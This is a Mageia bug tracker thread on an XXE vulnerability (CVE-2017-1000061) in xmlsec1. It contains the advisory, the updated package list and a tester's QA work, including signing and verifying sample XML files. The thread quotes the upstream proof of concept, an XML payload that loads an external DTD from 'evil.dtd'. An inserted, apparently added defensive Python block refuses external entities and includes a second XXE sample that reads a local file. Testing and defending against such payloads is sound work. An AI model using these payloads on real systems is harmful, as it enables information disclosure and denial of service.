Fedora has issued an advisory on February 3: https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3PWHBRWXR3RNPHDSTQI6UWDG5ETOQ7VR/ The issue is fixed upstream in 1.2.29. Mageia 7 is also affected.
Whiteboard: (none) => MGA7TOO
Done for both Cauldron and mga7!
CC: (none) => geiger.david68210
Advisory:
========================

Updated xmlsec1 packages fix security vulnerability:

It was discovered xmlsec1's use of libxml2 inadvertently enabled external entity expansion (XXE) along with validation. An attacker could craft an XML file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs, leading to information disclosure or denial of service (CVE-2017-1000061).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3PWHBRWXR3RNPHDSTQI6UWDG5ETOQ7VR/
========================

Updated packages in core/updates_testing:
========================

xmlsec1-1.2.29-1.mga7
libxmlsec1_1-1.2.29-1.mga7
libxmlsec1-openssl1-1.2.29-1.mga7
libxmlsec1-nss1-1.2.29-1.mga7
libxmlsec1-gnutls1-1.2.29-1.mga7
libxmlsec1-gcrypt1-1.2.29-1.mga7
libxmlsec1-devel-1.2.29-1.mga7

from xmlsec1-1.2.29-1.mga7.src.rpm
Whiteboard: MGA7TOO => (none)
Assignee: java => qa-bugs
Version: Cauldron => 7
Mageia7, x86_64

Before the update installing the devel package failed with this message:

The following packages can't be installed because they depend on packages that are older than the installed ones:
lib64xslt-devel-1.1.33-2.1.mga7
lib64xmlsec1-devel-1.2.28-1.mga7

The others install OK.

Tried to run the PoC but had difficulties:
CVE-2017-1000061
https://github.com/lsh123/xmlsec/issues/43

$ cat input.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;]>
$ xmlsec1 --verify --output /tmp/output.xml input.xml
....
Failed to find xmlsec-openssl library.

/usr/lib64/libxmlsec1-openssl.so.1.2.28 is installed.
Cannot unravel this.

And also, re lib64xmlsec1-devel, removing lib64xslt-devel would take 148 other packages with it. Had hoped to reinstall it to pick up the correct package, assuming that the xslt one is the source of the problem.

$ urpmq --requires lib64xmlsec1-devel
....
pkgconfig(libxslt)[>= 1.0.20]
$ locate libxslt
/usr/lib64/libxslt.so.1.1.33

Why is it complaining? Recursive query lists lib64xslt1
$ rpm -qa | grep lib64xslt1
lib64xslt1-1.1.33-2.2.mga7
CC: (none) => tarazed25
Keywords: (none) => feedback
Assignee: qa-bugs => geiger.david68210
Keywords: feedback => (none)
CC: (none) => qa-bugs
Status comment: (none) => Update built, but CLI tool fails to find its own library
(In reply to Len Lawrence from comment #3)
> Failed to find xmlsec-openssl library.
>
> /usr/lib64/libxmlsec1-openssl.so.1.2.28 is installed.

Shouldn't it be /usr/lib64/libxmlsec1-openssl.so.1.2.29 ??
Len, did you ever actually test the update?
No. I was waiting to resolve the missing dependency. It looks like it was never installed so I have installed it now. Don't ask.
@David Geiger: in reply to comment 4 It is all coming back into focus now. It was the before update situation which was the problem. Testing the PoC against the 1.1.28 version failed because the xmlsec-openssl library could not be found even though libxmlsec1-openssl.so.1.2.28 was installed. Why would it complain? I felt uneasy about proceeding with testing in case something was seriously wrong.
It's only a problem if something is wrong with the update.
Assignee: geiger.david68210 => qa-bugs
CC: qa-bugs => (none)
Status comment: Update built, but CLI tool fails to find its own library => (none)
Continuing from comment 3:

Updated the seven packages and ran the PoC.

$ xmlsec1 --verify --output /tmp/output.xml input.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=59:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL
input.xml:2: parser error : Start tag expected, '<' not found
^
func=xmlSecParseFile:file=parser.c:line=414:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"

This agrees with the upstream test but we have no "before" example to compare it with. That is only half of the test anyway. It needs a server on localhost to listen on port 80. Don't know how to set that up.

Not knowing anything about this package it seemed appropriate to use the command from the PoC. Tried a few local XML files but failed every time.

$ xmlsec1 --verify --output /tmp/output.xml workspace.xml
Error: failed to find default node with name="Signature"
Error: failed to load document "workspace.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "workspace.xml"

The help indicates that verify refers to signed documents which these are not. Fiddled with an XML file as data and tried to create a document with a default template signature with the --sign-tmpl option but that fell flat.

$ xmlsec1 -output test1.xml --sign-tmpl workspace.xml

Need to do more research.
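The xmlSecNoXxeExternalEntityLoader line in the output above is xmlsec1 1.2.29 refusing to fetch the external parameter entity rather than loading it. The script below is an added example, not part of this bug report or of xmlsec; it reproduces that defence with Python's standard-library expat parser, refusing every external entity and recording the URI that was requested. It covers the parameter-entity form used in the PoC and, going beyond the page, the general-entity form; the samples are constructed, and "file:///placeholder/local-file" is a placeholder path.

```python
import xml.parsers.expat as expat


class NoXxeParser:
    """expat parser that refuses every external entity and records its URI."""

    def __init__(self):
        self.refused = []   # system identifiers the loader refused to fetch
        self.root = None    # name of the document element, if parsing got there
        self._parser = expat.ParserCreate()
        # Walk parameter entities as libxml2 does, so the external reference
        # in the DTD actually reaches our loader instead of being skipped.
        self._parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
        self._parser.ExternalEntityRefHandler = self._refuse
        self._parser.StartElementHandler = self._start

    def _refuse(self, context, base, system_id, public_id):
        # Returning 0 aborts the parse, like returning NULL from the
        # xmlsec1 entity loader; nothing is read from disk or the network.
        self.refused.append(system_id)
        return 0

    def _start(self, name, attrs):
        if self.root is None:
            self.root = name

    def parse(self, data):
        """Return (ok, refused URIs, root name, error); ok is False when
        any external entity was referenced."""
        try:
            self._parser.Parse(data, True)
        except expat.ExpatError as exc:
            return False, self.refused, self.root, str(exc)
        return True, self.refused, self.root, ""


def check(data):
    """Parse one document with a fresh NoXxeParser."""
    return NoXxeParser().parse(data)


# Constructed samples (not from the bug report): the PoC's parameter-entity
# form with a root element added, a general-entity form, and a benign file.
XXE_PARAM = (b'<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE root [ '
             b'<!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote; ]>\n<root/>')
XXE_GENERAL = (b'<?xml version="1.0"?>\n<!DOCTYPE root [ '
               b'<!ENTITY leak SYSTEM "file:///placeholder/local-file"> ]>\n<root>&leak;</root>')
BENIGN = b'<References><Book><Title>Applied Cryptography</Title></Book></References>'
```

Running check(XXE_PARAM) fails before the document element is reached and reports the refused URL, while check(BENIGN) succeeds with an empty refused list.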
Tried to verify various pem files found in the system. These fail on missing start tag. Looks like these are encrypted certificates. Decrypting does not work. Not making much headway with this.

The best I could do was to follow part of the tutorial at https://users.dcc.uchile.cl/~pcamacho/tutorial/web/xmlsec/xmlsec.html. Copied down the files and:

$ xmlsec1 --sign --output doc-signed.xml --privkey-pem userkey.pem doc.xml
Enter password for "userkey.pem" file:
$ ls
cacert.pem doc-signed.xml doc.xml pub-userkey.pem usercert.p12 userkey.pem

The generated XML file doc-signed.xml corresponded with the example online.

$ cat doc-signed.xml
<?xml version="1.0"?>
<References>
<Book>
<Author>
<FirstName>Bruce</FirstName>
<LastName>Schneier</LastName>
</Author>
<Title>Applied Cryptography</Title>
[..]
</RSAKeyValue>
</KeyValue>
</KeyInfo>
</Signature>
</References>
$ xmlsec1 --verify doc-signed.xml
OK
SignedInfo References (ok/all): 1/1
Manifests References (ok/all): 0/0

Deliberately corrupted the Title and Signature and tried again.

$ xmlsec1 --verify doc-signed.xml
func=xmlSecOpenSSLEvpDigestVerify:file=digests.c:line=280:obj=sha1:subj=unknown:error=12:invalid data:data and digest do not match
FAIL
SignedInfo References (ok/all): 0/1
Manifests References (ok/all): 0/0
Error: failed to verify file "doc-signed.xml"

$ cp doc.xml doc-id.xml

Made a benign change to doc-id.xml, adding an id to the Book node.

$ xmlsec1 --sign --output doc-id-signed.xml --privkey-pem userkey.pem doc-id.xml
Enter password for "userkey.pem" file:
$ ll doc-id-signed.xml
$ ll doc-id-signed.xml
-rw-r--r-- 1 lcl lcl 1387 Feb 23 20:43 doc-id-signed.xml
$ xmlsec1 --verify doc-id-signed.xml
OK
SignedInfo References (ok/all): 1/1
Manifests References (ok/all): 0/0

There is more, but to avoid getting out of my depth I am sending this on.
Whiteboard: (none) => MGA7-64-OK
Thank you for all your effort, Len. I'm going to go ahead and validate. Advisory in Comment 2.
CC: (none) => andrewsfarm, sysadmin-bugs
Keywords: (none) => validated_update
CC: (none) => tmb
Keywords: (none) => advisory
An update for this issue has been pushed to the Mageia Updates repository. https://advisories.mageia.org/MGASA-2020-0104.html
Resolution: (none) => FIXED
Status: NEW => RESOLVED